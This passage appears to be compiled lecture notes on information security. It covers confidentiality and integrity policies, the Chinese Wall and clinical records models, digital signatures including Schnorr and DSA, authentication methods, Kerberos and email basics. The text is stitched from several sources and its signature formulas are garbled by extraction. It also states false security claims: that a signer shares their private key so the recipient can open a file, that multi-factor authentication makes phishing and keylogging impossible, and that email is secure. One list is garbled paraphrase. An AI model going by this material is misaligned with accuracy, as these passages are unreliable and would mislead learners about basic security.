its confidentiality.
Issues of Confidentiality :
Confidentiality in information security can be challenging to maintain, and there are several
issues that can arise, including:
1. Insider threats: Employees and contractors who have access to sensitive information
can pose a threat to confidentiality if they intentionally or accidentally disclose it.
2. Cyberattacks: Hackers and cybercriminals can exploit vulnerabilities in systems and
networks to access and steal confidential information.
3. Social engineering: Social engineers use tactics like phishing and pretexting to trick
individuals into revealing sensitive information, compromising its confidentiality.
4. Human error: Confidential information can be accidentally disclosed through human
error, such as sending an email to the wrong recipient or leaving sensitive information in
plain sight.
5. Technical failures: Technical failures, such as hardware failures or data breaches, can
result in the loss or exposure of confidential information.
6. Inadequate security measures: Inadequate security measures, such as weak passwords
or outdated encryption algorithms, can make it easier for unauthorized parties to access
confidential information.
7. Legal and regulatory compliance: Confidentiality can be impacted by legal and
regulatory requirements, such as data protection laws, that may require the disclosure of
sensitive information in certain circumstances.
Integrity policies:
Integrity is the protection of system data from intentional or accidental unauthorized
changes. The challenges of the security program are to ensure that data is maintained in the
state that is expected by the users. Although the security program cannot improve the
accuracy of the data that is put into the system by users. It can help ensure that any changes
are intended and correctly applied. An additional element of integrity is the need to protect
the process or program used to manipulate the data from unauthorized modification. A
critical requirement of both commercial and government data processing is to ensure the
integrity of data to prevent fraud and errors. It is imperative, therefore, no user be able to
modify data in a way that might corrupt or lose assets or financial records or render
decision making information unreliable. Examples of government systems in which
integrity is crucial include air traffic control system, military fire control systems, social
security and welfare systems. Examples of commercial systems that require a high level of
integrity include medical prescription system, credit reporting systems, production control
systems and payroll systems.
Protecting against Threats to Integrity: Like confidentiality, integrity can also be
arbitrated by hackers, masqueraders, unprotected downloaded files, LANs, unauthorized
user activities, and unauthorized programs like Trojan Horse and viruses, because each of
these threads can lead to unauthorized changes to data or programs. For example,
unauthorized user can corrupt or change data and programs intentionally or accidentally if
their activities on the system are not properly controlled. Generally, three basic principles
are used to establish integrity controls:
1. Need-to-know access: User should be granted access only into those files and programs
that they need in order to perform their assigned jobs functions.
2. Separation of duties: To ensure that no single employee has control of a transaction
from beginning to end, two or more people should be responsible for performing it.
3. Rotation of duties: Job assignment should be changed periodically so that it becomes
more difficult for the users to collaborate to exercise complete control of a transaction
and subvert it for fraudulent purposes.
Integrity Models – Integrity models are used to describe what needs to be done to enforce
the information integrity policy. There are three goals of integrity, which the models
address in various ways:
1. Preventing unauthorized users from making modifications to data or programs.
2. Preventing authorized users from making improper or unauthorized modifications.
3. Maintaining internal and external consistency of data and programs.
Hybrid policies:
Chinese Wall Model. Security policy that refers equally to confidentiality and integrity.
Describes policies that involve conflict of interest in business.
Def: The objects of the database are items of information related to a company.
Def: A Conflict Of Interest (COI) class contains the datasets of companies in competition
S can read O iff either 1. There is an object O such that S has accessed O’ and CD(O’) =
CD(O).
2. For all objects O’, O’ PR(S) COI(O’) COI(O) where PR(S) is the set of previously read
objects by S.
3. O is a sanitized object.
Subject affects:
a. Once a subject reads any object in a COI class, the only other objects that the subject can
read in that class are the same objects, i.e. once one object is read, no other objects in another
class can be read.
b. The minimum number of subjects needed to access each object in a class is the number of
objects in that class.
CW-*-Property :
A subject S may write to an object O iff both of the following conditions hold
This prevents one subject from writing sensitive information in the shared common object
from an unshared object.
Clinical Information Systems Security Policy Electronic medical records present their own
requirements for policies that combine confidentiality and integrity.
Patient confidentiality, authentication of both records and those making entries in those
records, and assurance that the records have not been changed erroneously are most critical.
Def: A patient is the subject of medical records, or an agent for that person who can give
consent for the person to be treated.
Def: Personal health information (electronic medical record) is information about a patient’s
health or treatment enabling that patient to be identified.
Def: A clinician is a health-care professional who has access to personal health information
while performing his or her job.
Guided by the Clark-Wilson model, we have a set of principles that address electronic
medical records. Access to the electronic medical records must be restricted to the clinician
and the clinician’s practice group.
Access Principle 1: Each medical record has an access control list naming the individuals or
groups who may read and append information to the record. The system must restrict access
to those identified on the access control list. Medical ethics require that only clinicians and
the patient have access to the patient’s electronic medical records.
Access Principle 2: One of the clinicians on the access control list (called the responsible
clinician) must have the right to add other clinicians to the access control list. The patient
must consent to any treatment. Hence, the patient has the right to know when his or her
electronic medical records are accessed or altered. Also the electronic medical records system
must prevent the leakage of information. Hence, the patient must be notified when their
electronic medical records are accessed by a clinician that the patient does not know.
Access Principle 3: The responsible clinician must notify the patient of the names on the
access control list whenever the patient’s medical record is opened. Except in situations given
in statutes or in cases of emergency, the responsible clinician must obtain the patient’s
consent. Auditing who accesses the patient’s electronic medical records, when those records
were accessed, and what changes, if any, were made to the electronic medical records must
be recorded to adhere to numerous government medical information requirements.
Access Principle 4: The name of the clinician, the date, and the time of the access of a
medical record must be recorded. Similar information must be kept for deletions. The
following principles deal with record creation, and information deletion. New electronic
medical records should allow the attending clinician and the patient access to those records.
Additionally, the referring clinician, if any, should have access to those records to see the
results of any referral.
Creation Principle: A clinician may open a record, with the clinician and the patient on the
access control list. If the record is opened as a result of a referral, the referring clinician may
also be on the access control list. Electronic medical records should be kept the required
amount of time, normally 8 years except in some instances.
Deletion Principle: Clinical information cannot be deleted from a medical record until the
appropriate time has passed. When copying electronic medical records, care must be taken to
prevent the unauthorized disclosure of a patient’s medical records.
Aggregation Principle: Measures for preventing the aggregation of patient data must be
effective. In particular a patient must be notified if anyone is to be added to the access control
list for the patient’s record and if that person has access to a large number of medical records.
There must be system mechanisms implemented to enforce all of these principles.
Enforcement Principle: Any computer system that handles medical records must have a
subsystem that enforces the preceding principles. The effectiveness of this enforcement must
be subject to evaluation by independent auditors.
UNIT III DIGITAL SIGNATURE AND AUTHENTICATION
DIGITAL SIGNATURE:
A digital signature is a mathematical technique used to validate the authenticity and integrity
of a digital document, message or software. It's the digital equivalent of a handwritten
signature or stamped seal, but it offers far more inherent security. A digital signature is
intended to solve the problem of tampering and impersonation in digital communications.
Digital signatures can provide evidence of origin, identity and status of electronic documents,
transactions or digital messages. Signers can also use them to acknowledge informed consent.
In many countries, including the U.S., digital signatures are considered legally binding in the
same way as traditional handwritten document signatures.
Digital signatures are based on public key cryptography, also known as asymmetric
cryptography. Using a public key algorithm -- such as Rivest-Shamir-Adleman, or RSA --
two keys are generated, creating a mathematically linked pair of keys: one private and one
public.
Digital signatures work through public key cryptography's two mutually authenticating
cryptographic keys. For encryption and decryption, the person who creates the digital
signature uses a private key to encrypt signature-related data. The only way to decrypt that
data is with the signer's public key.
If the recipient can't open the document with the signer's public key, that indicates there's a
problem with the document or the signature. This is how digital signatures are authenticated.
Digital certificates, also called public key certificates, are used to verify that the public key
belongs to the issuer. Digital certificates contain the public key, information about its owner,
expiration dates and the digital signature of the certificate's issuer. Digital certificates are
issued by trusted third-party certificate authorities (CAs), such as Docu Sign or Global Sign,
for example. The party sending the document and the person signing it must agree to use a
given CA.
Digital signature technology requires all parties trust that the person who creates the signature
image has kept the private key secret. If someone else has access to the private signing key,
that party could create fraudulent digital signatures in the name of the private key holder.
Timestamping. This provides the date and time of a digital signature and is useful when
timing is critical, such as for stock trades, lottery ticket issuance and legal proceedings.
Globally accepted and legally compliant. The public key infrastructure (PKI) standard
ensures vendor-generated keys are made and stored securely. With digital signatures
becoming an international standard, more countries are accepting them as legally binding.
Cost savings. Organizations can go paperless and save money previously spent on the
physical resources, time, personnel and office space used to manage and transport
documents.
Positive environmental effects. Reducing paper use also cuts down on the physical waste
generated by paper and the negative environmental impact of transporting paper
documents.
Traceability. Digital signatures create an audit trail that makes internal record-keeping
easier for businesses. With everything recorded and stored digitally, there are fewer
opportunities for a manual signee or record-keeper to make a mistake or misplace
something.
How do you create a digital signature?
A hash is a fixed-length string of letters and numbers generated by an algorithm. The digital
signature creator's private key is used to encrypt the hash. The encrypted hash -- along with
other information, such as the hashing algorithm -- is the digital signature.
The reason for encrypting the hash instead of the entire message or document is because a
hash function can convert an arbitrary input into a fixed-length value, which is usually much
shorter. This saves time, as hashing is much faster than signing.
The value of a hash is unique to the hashed data. Any change in the data -- even a
modification to a single character -- results in a different value. This attribute enables others
to use the signer's public key to decrypt the hash to validate the integrity of the data.
If the decrypted hash matches a second computed hash of the same data, it proves that the
data hasn't changed since it was signed. But, if the two hashes don't match, the data has either
been tampered with in some way and is compromised or the signature was created with a
private key that doesn't correspond to the public key presented by the signer. This signals an
issue with authentication.
The first step would be for you to type out the message or ready the file you want to
send. Your private key would work as the stamp for this file. It could be a code or a
password. Then you press send and the email reaches ABC Office via the internet.
In the second step, the ABC Office would receive your file and verify your signature
using your public key. They will then be able to access the encrypted file.
The final step would require the ABC Office to use the private key that you’ve shared,
to reveal whatever file you’ve mailed them. If the recipient doesn’t have your private
key, they won’t be able to access the information in the document.
A digital signature can be used with any kind of message, whether or not it's encrypted,
simply so the receiver can be sure of the sender's identity and that the message arrived intact.
Digital signatures make it difficult for the signer to deny having signed something, as the
digital signature is unique to both the document and the signer and it binds them together.
This property is called nonrepudiation.
The digital certificate is the electronic document that contains the digital signature of the
issuing CA. It's what binds together a public key with an identity and can be used to verify
that a public key belongs to a particular person or entity. Most modern email programs
support the use of digital signatures and digital certificates, making it easy to sign any
outgoing emails and validate digitally signed incoming messages.
Digital signatures are also used extensively to provide proof of authenticity, data integrity and
nonrepudiation of communications and transactions conducted over the internet.
Classes and types of digital signatures
There are three different classes of digital signature certificates (DSCs) as follows:
Class 1. This type of DSC can't be used for legal business documents, as they're validated
based only on an email ID and username. Class 1 signatures provide a basic level of
security and are used in environments with a low risk of data compromise.
Class 2. These DSCs are often used for electronic filing (e-filing) of tax documents,
including income tax returns and goods and services tax returns. Class 2 digital signatures
authenticate a signer's identity against a pre-verified database. Class 2 digital signatures
are used in environments where the risks and consequences of data compromise are
moderate.
Class 3. The highest level of digital signatures, Class 3 signatures require people or
organizations to present in front of a CA to prove their identity before signing. Class 3
digital signatures are used for e-auctions, e-tendering, e-ticketing and court filings, as well
as in other environments where threats to data or the consequences of a security failure are
high.
Uses for digital signatures
Digital signature tools and services are commonly used in contract-heavy industries,
including the following:
Healthcare. Digital signatures are used in the healthcare industry to improve the
efficiency of treatment and administrative processes, strengthen data security, e-prescribe
and process hospital admissions. The use of digital signatures in healthcare must comply
with the Health Insurance Portability and Accountability Act of 1996.
Manufacturing. Manufacturing companies use digital signatures to speed up processes,
including product design, quality assurance, manufacturing enhancements, marketing and
sales. The use of digital signatures in manufacturing is governed by the International
Organization for Standardization and the National Institute of Standards and
Technology Digital Manufacturing Certificate.
Financial services. The U.S. financial sector uses digital signatures for contracts,
paperless banking, loan processing, insurance documentation and mortgages. This heavily
regulated sector uses digital signatures, paying careful attention to the regulations and
guidance put forth by the Electronic Signatures in Global and National Commerce Act (E-
Sign Act), state Uniform Electronic Transactions Act regulations, the Consumer Financial
Protection Bureau and the Federal Financial Institutions Examination Council.
Non-fungible tokens (NFTs). Digital signatures are used with digital assets -- such as
artwork, music and videos -- to secure and trace these types of NFTs anywhere on the
blockchain.
Security is the main benefit of using digital signatures. Security features and methods used in
digital signatures include the following:
PINs, passwords and codes. These are used to authenticate and verify a signer's identity
and approve their signature. Email, username and password are the most common methods
used.
Asymmetric cryptography. This employs a public key algorithm that includes private
and public key encryption and authentication.
Checksum. This long string of letters and numbers is used to determine the authenticity of
transmitted data. A checksum is the result of running a cryptographic hash function on a
piece of data. The value of the original checksum file is compared against the checksum
value of the calculated file to detect errors or changes. A checksum acts like a data
fingerprint.
CRC. A type of checksum, this error-detecting code and verification feature is used in
digital networks and storage devices to detect changes to raw data.
CA validation. CAs issue digital signatures and act as trusted third parties by accepting,
authenticating, issuing and maintaining digital certificates. The use of CAs helps avoid the
creation of fake digital certificates.
TSP validation. This person or legal entity validates a digital signature on a company's
behalf and offers signature validation reports.
Digital signature attacks
Chosen-message attack. The attacker either obtains the victim's public key or tricks the
victim into digitally signing a document they don't intend to sign.
Known-message attack. The attacker obtains messages the victim sent and a key that
enables the attacker to forge the victim's signature on documents.
Key-only attack. The attacker only has access to the victim's public key and can re-create
the victim's signature to digitally sign documents or messages that the victim doesn't
intend to sign.
Digital signature tools and vendors
There are numerous e-signature tools and technologies on the market, including the
following:
Adobe Acrobat Sign is a cloud-based service that's designed to provide secure, legal e-
signatures across all device types. Adobe Acrobat Sign integrates with existing
applications, including Microsoft Office and Dropbox.
Dropbox Sign helps users prepare, send, sign and track documents. Features of the tool
include embedded signing, custom branding and embedded templates. Dropbox Sign also
integrates with applications such as Microsoft Word, Slack and Box.
GlobalSign provides a host of management, integration and automation tools to
implement PKI across enterprise environments.
PandaDoc provides e-signature software that helps users upload, send and collect
payments for documents. Users can also track document status and receive notifications
when someone opens, views, comments on or signs a document.
ReadySign from Onit provides users with customizable templates and forms for e-
signatures. Software features include bulk sending, notifications, reminders, custom
signatures and document management with role-based permissions.
Signeasy offers an e-signing service of the same name to businesses and individuals, as
well as application programming interfaces for developers.
SignNow, which is part of AirSlate Business Cloud, provides businesses with a PDF
signing tool.
As with the Elgamal digital signature scheme, the Schnorr signature scheme is
based on discrete logarithms [SCHN89, SCHN91]. The Schnorr scheme minimizes
the message-dependent amount of computation required to generate a signature.
The main work for signature generation does not depend on the message and can
be done during the idle time of the processor. The message-dependent part of the
signature generation requires multiplying a 2n-bit integer with an n-bit integer.
The scheme is based on using a prime modulus p, with p - 1 having a prime
factor q of appropriate size; that is, p - 1 K 0 (mod q). Typically, we use p ≈ 21024
and q ≈ 2160. Thus, p is a 1024-bit number, and q is a 160-bit number, which is also
the length of the SHA-1 hash value.
The first part of this scheme is the generation of a private/public key pair,
which consists of the following steps.
1. Choose primes p and q, such that q is a prime factor of p - 1.
2. Choose an integer a, such that aq = 1 mod p. The values a, p, and q comprise a
global public key that can be common to a group of users.
3. Choose a random integer s with 0 6 s 6 q. This is the user’s private key.
4. Calculate v = a-s mod p. This is the user’s public key.
A user with private key s and public key v generates a signature as follows.
1. Choose a random integer r with 0 6 r 6 q and compute x = ar mod p. This
computation is a preprocessing stage independent of the message M to be
signed.
2. Concatenate the message with x and hash the result to compute the value e:
e = H(M} x)
3. Compute y = (r + se) mod q. The signature consists of the pair (e, y).
Any other user can verify the signature as follows.
1. Compute x′ = ayve mod p.
2. Verify that e = H (M} x′).
To see that the verification works, observe that
x′ K ayve K aya-se K ay-se K ar K x (mod p)
Hence, H (M} x′) = H (M} x).
Signature Algorithm (DSA). The DSA makes use of the Secure Hash Algorithm
(SHA) described in Chapter 12. The DSA was originally proposed in 1991 and
scheme. There was a further minor revision in 1996. In 2000, an expanded version
of the standard was issued as FIPS 186-2, subsequently updated to FIPS 186-3 in
2009, and FIPS 186-4 in 2013. This latest version also incorporates digital signature
we discuss DSA.
The DSA uses an algorithm that is designed to provide only the digital signature
The signature of a message M consists of the pair of numbers r and s, which are
functions of the public key components (p, q, g), the user’s private key (x), the hash
code of the message H(M), and an additional integer k that should be generated
randomly or pseudorandomly and be unique for each signing.
Let M, r′, and s′ be the received versions of M, r, and s, respectively.
Verification is performed using the formulas shown in Figure 13.3. The receiver
generates a quantity v that is a function of the public key components, the sender’s
public key, the hash code of the incoming message, and the received versions of r
and s. If this quantity matches the r component of the signature, then the signature
is validated.
EM generated by the signer. The constants are known to the verifier, so that the
computed constants can be compared to the known constants as an additional check
that the signature is valid (in addition to comparing H and H′). The salt results in a
different signature every time a given message is signed with the same private key.
The verifier does not know the value of the salt and does not attempt a comparison.
Thus, the salt plays a similar role to the pseudorandom variable k in the NIST DSA
and in ECDSA. In both of those schemes, k is a pseudorandom number generated by
the signer, resulting in different signatures from multiple signings of the same message
with the same private key. A verifier does not and need not know the value of k.
Sender Side : In DSS Approach, a hash code is generated out of the message and following
inputs are given to the signature function –
1. The hash code.
2. The random number ‘k’ generated for that particular signature.
3. The private key of the sender i.e., PR(a).
4. A global public key(which is a set of parameters for the communicating principles) i.e.,
PU(g).
These input to the function will provide us with the output signature containing two
components – ‘s’ and ‘r’. Therefore, the original message concatenated with the signature is
sent to the receiver. Receiver Side : At the receiver end, verification of the sender is done.
The hash code of the sent message is generated. There is a verification function which takes
the following inputs –
1. The hash code generated by the receiver.
2. Signature components ‘s’ and ‘r’.
3. Public key of the sender.
4. Global public key.
The output of the verification function is compared with the signature component ‘r’. Both
the values will match if the sent signature is valid because only the sender with the help of
it private key can generate a valid signature.
Benefits of advanced signature:
1.A computerized signature gives better security in the exchange. Any unapproved
individual can’t do fakeness in exchanges.
2.You can undoubtedly follow the situation with the archives on which the computerized
mark is applied.
3.High velocity up record conveyance.
4.It is 100 percent lawful it is given by the public authority approved ensuring authority.
5.In the event that you have marked a report carefully, you can’t deny it.
6.In this mark, When a record is get marked, date and time are consequently stepped on it.
7.It is preposterous to expect to duplicate or change the report marked carefully.
8.ID of the individual that signs.
9.Disposal of the chance of committing misrepresentation by a sham.
Authentication:
Authentication is the process of verifying the identity of a user or information. User
authentication is the process of verifying the identity of a user when that user logs in to a
computer system.
There are different types of authentication systems which are: –
1. Single-Factor authentication: – This was the first method of security that was developed.
On this authentication system, the user has to enter the username and the password to
confirm whether that user is logging in or not. Now if the username or password is wrong,
then the user will not be allowed to log in or access the system.
Advantage of the Single-Factor Authentication System: –
It is a very simple to use and straightforward system.
it is not at all costly.
The user does not need any huge technical skills.
The disadvantage of the Single-Factor Authentication
It is not at all password secure. It will depend on the strength of the password entered by
the user.
The protection level in Single-Factor Authentication is much low.
2. Two-factor Authentication: – In this authentication system, the user has to give a
username, password, and other information. There are various types of authentication
systems that are used by the user for securing the system. Some of them are: – wireless
tokens and virtual tokens. OTP and more.
Advantages of the Two-Factor Authentication
The Two-Factor Authentication System provides better security than the Single-factor
Authentication system.
The productivity and flexibility increase in the two-factor authentication system.
Two-Factor Authentication prevents the loss of trust.
Disadvantages of Two-Factor Authentication
It is time-consuming.
3. Multi-Factor authentication system,: – In this type of authentication, more than one
factor of authentication is needed. This gives better security to the user. Any type of
keylogger or phishing attack will not be possible in a Multi-Factor Authentication system.
This assures the user, that the information will not get stolen from them.
The advantage of the Multi-Factor Authentication System are: –
No risk of security.
No information could get stolen.
No risk of any key-logger activity.
No risk of any data getting captured.
The disadvantage of the Multi-Factor Authentication System are: –
It is time-consuming.
it can rely on third parties. The main objective of authentication is to allow authorized
users to access the computer and to deny access to unauthorized users. Operating
Systems generally identify/authenticates users using the following 3 ways: Passwords,
Physical identification, and Biometrics. These are explained as following below.
1. Passwords: Password verification is the most popular and commonly used
authentication technique. A password is a secret text that is supposed to be known
only to a user. In a password-based system, each user is assigned a valid username
and password by the system administrator. The system stores all usernames and
Passwords. When a user logs in, their user name and password are verified by
comparing them with the stored login name and password. If the contents are the
same then the user is allowed to access the system otherwise it is rejected.
2. Physical Identification: This technique includes machine-readable badges(symbols),
cards, or smart cards. In some companies, badges are required for employees to gain
access to the organization’s gate. In many systems, identification is combined with
the use of a password i.e the user must insert the card and then supply his /her
password. This kind of authentication is commonly used with ATMs. Smart cards can
enhance this scheme by keeping the user password within the card itself. This allows
authentication without the storage of passwords in the computer system. The loss of
such a card can be dangerous.
3. Biometrics: This method of authentication is based on the unique biological
characteristics of each user such as fingerprints, voice or face recognition, signatures,
and eyes.
4. A scanner or other devices to gather the necessary data about the user.
5. Software to convert the data into a form that can be compared and stored.
6. A database that stores information for all authorized users.
7. Facial Characteristics – Humans are differentiated on the basis of facial
characteristics such as eyes, nose, lips, eyebrows, and chin shape.
8. Fingerprints – Fingerprints are believed to be unique across the entire human
population.
9. Hand Geometry – Hand geometry systems identify features of the hand that includes
the shape, length, and width of fingers.
10. Retinal pattern – It is concerned with the detailed structure of the eye.
11. Signature – Every individual has a unique style of handwriting, and this feature is
reflected in the signatures of a person.
12. Voice – This method records the frequency pattern of the voice of an individual
speaker.
Authentication Requirements:
Authentication Requirements In the context of communications across a network, the
following attacks can be identified:
1. Disclosure: Release of message contents to any person or process not possessing the
appropriate cryptographic key.
3. Masquerade: Insertion of messages into the network from a fraudulent source. This
includes the creation of messages by an opponent that are purported to come from an
authorized entity. Also included are fraudulent acknowledgments of message receipt or
nonreceipt by someone other than the message recipient.
Message authentication is a procedure to verify that received messages come from the
alleged source and have not been altered. Message authentication may also verify sequencing
and timeliness.
At the lower level, there must be some sort of function that Authentication Requirements
produces an authenticator: a value to be used to authenticate a message. This lowerlevel
function is then used as primitive in a higher-level authentication protocol that enables a
receiver to verify the authenticity of a message. This section is concerned with the types of
functions that may be used to produce an authenticator. These functions may be grouped into
three classes, as follows:
1. Message Encryption: The ciphertext of the entire message serves as its authenticator.
2. Message Authentication Code1 (MAC): A public function of the message and a secret
key that produces a fixed length value that serves as the authenticator.
3. Hash Functions: A public function that maps a message of any length into a fixed length
hash value, which serves as the authenticator. We will mainly be concerned with the last class
of function however it must be noted that hash functions and MACs are very similar except
that a hash code doesn’t require a secret key. With regard to the first class, this can be seen to
provide authentication by virtue of the fact that only the sender and receiver know the key.
Therefore the message could only have come from the sender. However there is also the
problem that the plaintext message should be recognisable as plaintext message (for example
if it was some sort of digitised X-rays it mightn’t be).
Authentication applications:
Authentication keeps invalid users out of databases, networks, and other resources. These
types of authentication use factors, a category of credential for verification, to confirm user
identity. Here are just a few authentication methods.
With SSO, users only have to log in to one application and, in doing so, gain access to
many other applications. This method is more convenient for users, as it removes the
obligation to retain multiple sets of credentials and creates a more seamless
experience during operative sessions.
Organizations can accomplish this by identifying a central domain (most ideally, an
IAM system) and then creating secure SSO links between resources. This process
allows domain-monitored user authentication and, with single sign-off, can ensure
that when valid users end their session, they successfully log out of all linked
resources and applications.
While common, PAP is the least secure protocol for validating users, due mostly to its lack of
encryption. It is essentially a routine log in process that requires a username and password
combination to access a given system, which validates the provided credentials. It’s now
most often used as a last option when communicating between a server and desktop or remote
device.
CHAP is an identity verification protocol that verifies a user to a given network with a higher
standard of encryption using a three-way exchange of a “secret.” First, the local router sends
a “challenge” to the remote host, which then sends a response with an MD5 hash function.
The router matches against its expected response (hash value), and depending on whether the
router determines a match, it establishes an authenticated connection—the “handshake”—or
denies access. It is inherently more secure than PAP, as the router can send a challenge at any
point during a session, and PAP only operates on the initial authentication approval.
This protocol supports many types of authentication, from one-time passwords to smart cards.
When used for wireless communications, EAP is the highest level of security as it allows a
given access point and remote device to perform mutual authentication with built-in
encryption. It connects users to the access point that requests credentials, confirms identity
via an authentication server, and then makes another request for an additional form of user
identification to again confirm via the server—completing the process with all messages
transmitted, encrypted.
Kerberos:
It is a network authentication protocol that uses third-party authorization for validating user
profiles. It also employs symmetric key cryptography for plain-text encryption and cipher-
text decryption. The keys in cryptography consist of a secret key that shares confidential
information between two or more objects.
In short, it helps in maintaining the privacy of an organization. Now, since you have
understood what Kerberos is, you might be thinking why Kerberos. There are various
authorization protocols but Kerberos is an improved version among all. It really becomes
difficult for cybercriminals to break into the Kerberos authentication system. There will be
flaws in an organization that need to be managed by using Kerberos for defending itself from
cybercriminals. The tool is used by popular operating systems such as Windows, UNIX,
Linux, etc. With the use of the Kerberos authentication system, the internet has become a
more secure place.
Parameters of Kerberos:
There are three main parameters that are used in Kerberos. They are:
1. Client
2. Server
3. Key Distribution Center (KDC)
It uses cryptography for maintaining mutual privacy by preventing the loss of packets while
transferring over the network.
Nowadays, Kerberos is used in every industry for maintaining a secure system to prevent
cybercrimes. The authentication protocols of it depend on regular auditing and various
authentication features. The two major goals of Kerberos are security and authentication.
Kerberos is used in email delivery systems, text messages, NFS, signaling, POSIX
authentication, and much more. It is also used in various networking protocols, such as
SMTP, POP, HTTP, etc. Further, it is used in client or server applications and in the
components of different operating systems to make them secure.
Kerberos working:
We have already discussed in the previous sections about Kerberos being an authentication
protocol. It has proved to be one of the essential components of client or server applications.
It is also used in various fields for network security and providing mutual authentication. In
this section, we will discuss how Kerberos works. For that, first, we need to know about
Kerberos’s components.
Components of Kerberos:
Authentication service
Ticket-granting service
For providing these services, Kerberos uses its various components. Further, let us discuss the
following principal components that are used for authentication:
1. Client
The client helps to initiate a service request for communicating with the user.
2. Server
All the services that are required by the user are hosted by the server.
As the name suggests, AS is used for the authentication of the client and the server. AS
assigns a ticket through Ticket Granting Ticket (TGT) to the client. The assigned ticket
ensures the authentication of the client to other servers.
Database
Ticket Granting Server (TGS)
Authentication Server (AS)
These parts reside in a single unit known as the Key Distribution Center.
This server provides a service to assign tickets to the user as a unique key for authentication.
There are unique keys that are used by the authentication server and the TGS for both clients
and servers. Now, let us look at the cryptographic secret keys that are used for authentication:
Client or User Secret Key: It is the hash of the password set by the user that acts as
the client or user secret key.
TGS Secret Key: It is the secret key that helps in deciding TGS.
Server Secret Key: It helps to determine the server that provides the services.
Architecture of Kerberos:
The following steps are involved in the Kerberos workflow:
Step 1: Initially, there is an authentication request from the client. The user requests TGS
from the authentication server.
Step 2: After the client’s request, the client data is validated by the KDC. The authentication
server verifies the client and the TGS from the database. The authentication server then
generates a cryptographic key (SK1) after checking both values and implementing the hash of
the password. The authentication server also computes a session key. This session key uses
the secret key of the client (SK2) for encryption.
Step 3: The authentication server then creates a ticket that consists of the ID, network
address, secret key, and lifetime of the client.
Step 4: The decryption of the message is then performed by the client by using the client’s
secret key.
Step 5: Now, the client demands entrance into the server by using TGS. The TGS creates a
ticket that acts as an authenticator here.
Step 6: Another ticket is generated by KDC for the file server. Then, the TGS decrypts the
ticket for obtaining the secret key initiated by the client. It checks the network address and ID
by decrypting the authenticator. If the client ID and the network address match successfully,
then KDC shares a service key with the client and the server.
Step 7: The client utilizes the file ticket for authentication. The message is decrypted by
using SK1 to obtain SK2. Again, the TGS generates a new ticket to send to the target server.
Step 8: Here, the target server decrypts the file ticket by using the secret key. After that, the
server performs checks on the client details by decrypting SK2. The target server also checks
the validity of the ticket. Finally, when all of the client’s encrypted data is decrypted and
verified, the server authenticates the client to use the services.
Kerberos Limitations:
Each network service must be modified individually for use with Kerberos
It doesn’t work well in a timeshare environment
Secured Kerberos Server
Requires an always-on Kerberos server
Stores all passwords are encrypted with a single key
Assumes workstations are secure
May result in cascading loss of trust.
Scalability
1. Enhanced security
Authorization from third parties, multiple secret keys, and cryptography make Kerberos one
of the most reliable authentication protocols in the industry. When using Kerberos, passwords
for the users are never sent through the network. They are sent in an encrypted form and the
hidden keys move through the device. It becomes impossible to collect enough data to
impersonate a customer or service, even if someone is recording conversations.
2. Access control
It is a key part of the businesses of the day. The protocol enables the best access control. With
the help of this protocol, a business gets a single point for upholding safety protocols and
keeping login records.
Transparent and accurate logs are important for auditing processes and inquiries. It clarifies
who was calling for what and at what moment for maintaining transparency.
4. Shared authentication
It allows users and service systems to authenticate each other. Users and server systems can
understand that they are communicating with valid partners at each stage of the
authentication process.
5. Limited-lifetime ticket
All tickets have serial numbers and lifelong data in the Kerberos model. Admins can monitor
the authorization time of the users. Short ticket lifetimes prove to be beneficial for avoiding
brute-force and repeat attacks.
6. Scalability
Several tech companies, including Apple, Microsoft, and Sun, have implemented the
Kerberos authentication system. This level of acceptance speaks volumes about the capability
of Kerberos to keep up with the needs of large companies.
7. Reusable authentications
The authentication of Kerberos is reusable and robust. Users need to verify devices with
Kerberos only once. They can verify network services for the lifespan of the ticket without
having to re-enter personal information.
E-mail:
Email stands for Electronic Mail. It is a method to sends messages from one computer to
another computer through the internet. It is mostly used in business, education, technical
communication, document interactions. It allows communicating with people all over the
world without bothering them. In 1971, a test email sent Ray Tomlinson to himself
containing text.
It is the information sent electronically between two of more people over a network. It
involves a sender and receiver/s.
History of Email:
The age of email services is older than ARPANET and the Internet. The early emails were
only sent to the same computer. Email services started in 1971 by Ray Tomlinson. He first
developed a system to send mail between users on different hosts across the ARPANET,
using @ sign with the destination server and was recognized as email.
Uses of Email:
Email services are used in various sectors, organizations, either personally, or
among a large group of people. It provides an easy way to communicate with
individuals or groups by sending and receiving documents, images, links, and other
files. It also provides the flexibility of communicating with others on their own
schedule.
Large or small companies can use email services to many employees, customers. A
company can send emails to many employees at a time. It becomes a professional
way to communicate. A newsletters service is also used to send company
advertisements, promotions, and other subscribed content to use advertisements,
promotions.
Types of Email
Newsletters
It is a type of email sent by an individual or company to the subscriber. It contains
an advertisement, product promotion, updates regarding the organization, and
marketing content. It might be upcoming events, seminars, webinars from the
organization.
On boarding emails
It is an email a user receives right after subscription. These emails are sent to buyers
to familiarize and tell them about to use a product. It also contains details about the
journey in the new organization.
Transactional
These types of emails might contain invoices for recent transactions, details about
transactions. If transactions failed then details about when the amount will be
reverted. We can say that transaction emails are confirmation of purchase.
Plain-Text Emails
These types of emails contain just simple text similar to other text message services.
It does not include images, videos, documents, graphics, or any attachments. Plain-
text emails are also used to send casual chatting like other text message services.
Advantages of Email Services
These are the following advantages of email services:
Easy and Fast:
Composing an email is very simple and one of the fast ways to communicate. We
can send an email within a minute just by clicking the mouse. It contains a
minimum lag time and can be exchanged quickly.
Secure:
Email services are a secure and reliable method to receive and send information.
The feature of spam provides more security because a user can easily eliminate
malicious content.
Mass Sending:
We can easily send a message to many people at a time through email. Suppose, a
company wants to send holiday information to all employees than using email, it
can be done easily. The feature of mail merge in MS Word provides more options to
send messages to many people just by exchanging relevant information.
Multimedia Email:
Email offers to send multimedia, documents, images, audio files, videos, and
various types of files. We can easily attach the types of files in the original format or
compressed format.
Malicious Use:
Anyone can send an email just by knowing their email address. An anonymous user
or unauthorized person can send an email if they have an email address. The
attachment feature of the email be the major disadvantage of it, hackers can send
viruses through email because sometimes the spam feature unable to classify
suspicious emails.
Spam:
In days email services improve this feature. To improve this feature sometimes
some important email is transferred into spam without any notification.
Time Consuming:
Responding through an email takes more time rather than other message services
like WhatsApp, Telegram, etc. Email is good for professional discussion but not
good for casual chatting.
Email Architecture:
Electronic mail, commonly known as email, is a method of exchanging messages over the
internet. Here are the basics of email:
1. An email address: This is a unique identifier for each user, typically in the format of
[email protected].
2. An email client: This is a software program used to send, receive and manage emails,
such as Gmail, Outlook, or Apple Mail.
3. An email server: This is a computer system responsible for storing and forwarding
emails to their intended recipients.
To send an email:
